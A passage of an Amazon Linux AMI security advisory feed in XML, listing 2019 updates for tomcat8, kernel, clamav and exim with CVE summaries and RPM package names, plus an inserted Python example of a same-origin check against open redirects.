arch="x86_64"><filename>Packages/graphviz-php54-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-R-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-debuginfo" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-debuginfo-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-graphs-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-lua" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-lua-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-tcl-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-python26" version="2.38.0" release="18.51.amzn1" 
epoch="0" arch="i686"><filename>Packages/graphviz-python26-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-java-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-gd-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php54-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-python27" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python27-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-ruby-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-doc-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-perl-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-guile-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-devel" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-devel-2.38.0-18.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2019-1208</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1208: important priority package update for tomcat8</title><issued date="2019-05-16 23:11:00" /><updated date="2019-05-20 18:59:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0199:
The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API&#039;s blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.
1693325:
CVE-2019-0199 tomcat: Apache Tomcat HTTP/2 DoS
CVE-2018-11784:
When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to &#039;/foo/&#039; when the user requested &#039;/foo&#039;) a specially crafted URL could be used to cause the redirect to be generated to any URI of the attacker&#039;s choice.
1636512:
CVE-2018-11784 tomcat: Open redirect in default servlet
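Added example (Python, written for this corpus; it is not Tomcat code and not part of the Amazon Linux advisory): a trailing-slash directory redirect of the kind CVE-2018-11784 concerns, with a check that the Location value stays an absolute-path reference on the same origin. The advisory does not say which crafted request form triggered the real bug; the shapes rejected below (network-path references starting with "//", backslash variants, full URLs) are the general open-redirect cases and are an assumption of this example, as are the sample paths.

```python
# Added example, not Tomcat code. A directory redirect helper with a
# same-origin check on the computed Location value.
from urllib.parse import urlsplit


class UnsafeRedirect(ValueError):
    """Raised when a computed redirect target could leave this origin."""


def is_same_origin_path(location):
    """True only for an absolute-path reference that cannot name another host.

    Rejects empty values, network-path references ("//evil.example/"),
    backslash variants that some browsers treat like forward slashes, and
    anything that parses with a scheme or netloc.
    """
    if not location or not location.startswith("/"):
        return False
    if location.startswith("//") or location.startswith("/\\"):
        return False
    if "\\" in location:
        return False
    parts = urlsplit(location)
    return parts.scheme == "" and parts.netloc == ""


def directory_redirect_location(request_path):
    """Return the Location for a trailing-slash redirect of request_path.

    Repeated leading slashes are collapsed before the slash is appended, so
    a request for "//evil.example" redirects to "/evil.example/" on this
    origin instead of producing a protocol-relative URL. The result is then
    validated; a value that still fails the check raises instead of being
    sent to the client.
    """
    normalized = "/" + request_path.lstrip("/")
    if not normalized.endswith("/"):
        normalized += "/"
    if not is_same_origin_path(normalized):
        raise UnsafeRedirect(normalized)
    return normalized
```

The normalization step is what removes the redirect target from the client's control; the validation step is defence in depth and can also be applied on its own to any Location value before it is emitted.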
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11784" title="" id="CVE-2018-11784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0199" title="" id="CVE-2019-0199" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package 
name="tomcat8-javadoc" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.40-1.79.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1212</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1212: important priority package update for kernel</title><issued date="2019-05-20 23:27:00" /><updated date="2019-05-20 23:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11815:
A flaw was found in the Linux kernel&#039;s implementation of RDS over TCP. On a system that has the rds_tcp kernel module loaded (either autoloaded by a local process calling listen(), or loaded manually), an attacker who is able to manipulate socket state while a network namespace is being torn down could trigger a use after free (UAF). This can lead to memory corruption and privilege escalation.
1708518:
CVE-2019-11815 kernel: race condition in rds_tcp_kill_sock in net/rds/tcp.c leading to use-after-free
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11815" title="" id="CVE-2019-11815" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.114" release="83.126.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.114-83.126.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1213</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1213: important priority package update for clamav</title><issued date="2019-05-16 23:16:00" /><updated date="2019-05-20 19:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1789:
CVE-2019-1788:
CVE-2019-1787:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1787" title="" id="CVE-2019-1787" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1788" title="" id="CVE-2019-1788" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1789" title="" id="CVE-2019-1789" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-lib" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.101.2" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.101.2-1.38.amzn1.noarch.rpm</filename></package><package name="clamav-filesystem" version="0.101.2" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.101.2-1.38.amzn1.noarch.rpm</filename></package><package name="clamav" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.101.2" release="1.38.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/clamav-milter-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamd" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.101.2-1.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1214</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1214: important priority package update for kernel</title><issued date="2019-05-29 19:35:00" /><updated date="2019-05-30 20:08:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9500:
If the Wake-up on Wireless LAN functionality is configured in the brcmfmac driver, which only works with Broadcom FullMAC chipsets, a malicious event frame can be constructed to trigger a heap buffer overflow in the brcmf_wowl_nd_results() function. This vulnerability can be exploited by compromised chipsets to compromise the host, or when used in combination with another brcmfmac driver flaw (CVE-2019-9503), can be used remotely. This can result in a remote denial of service (DoS). Due to the nature of the flaw, a remote privilege escalation cannot be fully ruled out.
1701224:
CVE-2019-9500 kernel: brcmfmac heap buffer overflow in brcmf_wowl_nd_results
CVE-2019-5489:
A new software page cache side channel attack scenario was discovered in operating systems that implement the very common &#039;page cache&#039; caching mechanism. A malicious user/process could use &#039;in memory&#039; page-cache knowledge to infer access timings to shared memory and gain knowledge which can be used to reduce effectiveness of cryptographic strength by monitoring algorithmic behavior, infer access patterns of memory to determine code paths taken, and exfiltrate data to a blinded attacker through page-granularity access times as a side-channel.
1664110:
CVE-2019-5489 Kernel: page cache side channel attacks
CVE-2019-3882:
A flaw was found in the Linux kernel&#039;s vfio interface implementation that permits violation of the user&#039;s locked memory limit. If a device is bound to a vfio driver, such as vfio-pci, and the local attacker is administratively granted ownership of the device, it may cause a system memory exhaustion and thus a denial of service (DoS).
1689426:
CVE-2019-3882 kernel: denial of service vector through vfio DMA mappings
CVE-2019-11884:
The do_hidp_sock_ioctl function in net/bluetooth/hidp/sock.c in the Linux kernel before 5.0.15 allows a local user to obtain potentially sensitive information from kernel stack memory via a HIDPCONNADD command, because a name field may not end with a &#039;\0&#039; character.
1709837:
CVE-2019-11884 kernel: sensitive information disclosure from kernel stack memory via HIDPCONNADD command
CVE-2019-10142:
A flaw was found in the Linux kernel&#039;s freescale hypervisor manager implementation. A parameter passed via an ioctl was incorrectly validated and then used in the page size calculation. An attacker can use this flaw to crash the system or corrupt memory or, possibly, create other adverse security effects.
1711194:
CVE-2019-10142 kernel: integer overflow in ioctl handling of fsl hypervisor
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10142" title="" id="CVE-2019-10142" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11884" title="" id="CVE-2019-11884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3882" title="" id="CVE-2019-3882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5489" title="" id="CVE-2019-5489" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9500" title="" id="CVE-2019-9500" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package 
name="perf" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.121-85.96.amzn1.i686.rpm</filename></package><package 
name="kernel-debuginfo-common-i686" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.121-85.96.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1221</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1221: critical priority package update for exim</title><issued date="2019-06-05 17:12:00" /><updated date="2019-06-05 23:22:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-10149:
A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of the recipient address in the deliver_message() function in /src/deliver.c may lead to remote command execution.
1715237:
CVE-2019-10149 exim: Remote command execution in deliver_message() function in /src/deliver.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149" title="" id="CVE-2019-10149" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-debuginfo" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.91-1.20.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.91-1.20.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.91-1.20.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.91-1.20.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.91" release="1.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-mon-4.91-1.20.amzn1.i686.rpm</filename></package><package name="exim" version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.91-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1222</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1222: critical priority package update for kernel</title><issued date="2019-06-13 21:37:00" /><updated date="2019-06-17 17:58:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11479:
CVE-2019-11478:
CVE-2019-11477:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11477" title="" id="CVE-2019-11477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11478" title="" id="CVE-2019-11478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11479" title="" id="CVE-2019-11479" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" 
version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.123-86.109.amzn1.i686.rpm</filename></package><package 
